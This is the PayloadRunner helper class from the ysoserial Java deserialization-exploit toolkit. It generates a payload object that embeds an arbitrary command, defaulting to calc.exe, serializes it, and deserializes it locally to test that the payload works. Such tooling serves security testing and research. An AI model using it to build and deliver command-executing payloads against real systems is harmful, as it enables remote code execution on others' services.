Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
package ysoserial.payloads.util;
2

3
import static ysoserial.payloads.util.Serializables.deserialize;
4
import static ysoserial.payloads.util.Serializables.serialize;
5

6
import java.util.concurrent.Callable;
7

8
import ysoserial.ExecBlockingSecurityManager;
9
import ysoserial.payloads.ObjectPayload;
10

11
/*
12
 * utility class for running exploits locally from command line
13
 */
14
@SuppressWarnings("unused")
15
public class PayloadRunner {
16
	public static void run(final Class<? extends ObjectPayload<?>> clazz, final String[] args) throws Exception {		
17
		// ensure payload generation doesn't throw an exception
18
		byte[] serialized = ExecBlockingSecurityManager.wrap(new Callable<byte[]>(){
19
			public byte[] call() throws Exception {
20
				final String command = args.length > 0 && args[0] != null ? args[0] : "calc.exe";
21
				
22
				System.out.println("generating payload object(s) for command: '" + command + "'");
23
				
24
				final Object objBefore = clazz.newInstance().getObject(command);
25
				
26
				System.out.println("serializing payload");
27
				
28
				return serialize(objBefore);
29
		}});			
30
			
31
		try {	
32
			System.out.println("deserializing payload");			
33
			final Object objAfter = deserialize(serialized);			
34
		} catch (Exception e) {
35
			e.printStackTrace();
36
		}
37

38
	}	
39
	
40
}
41

42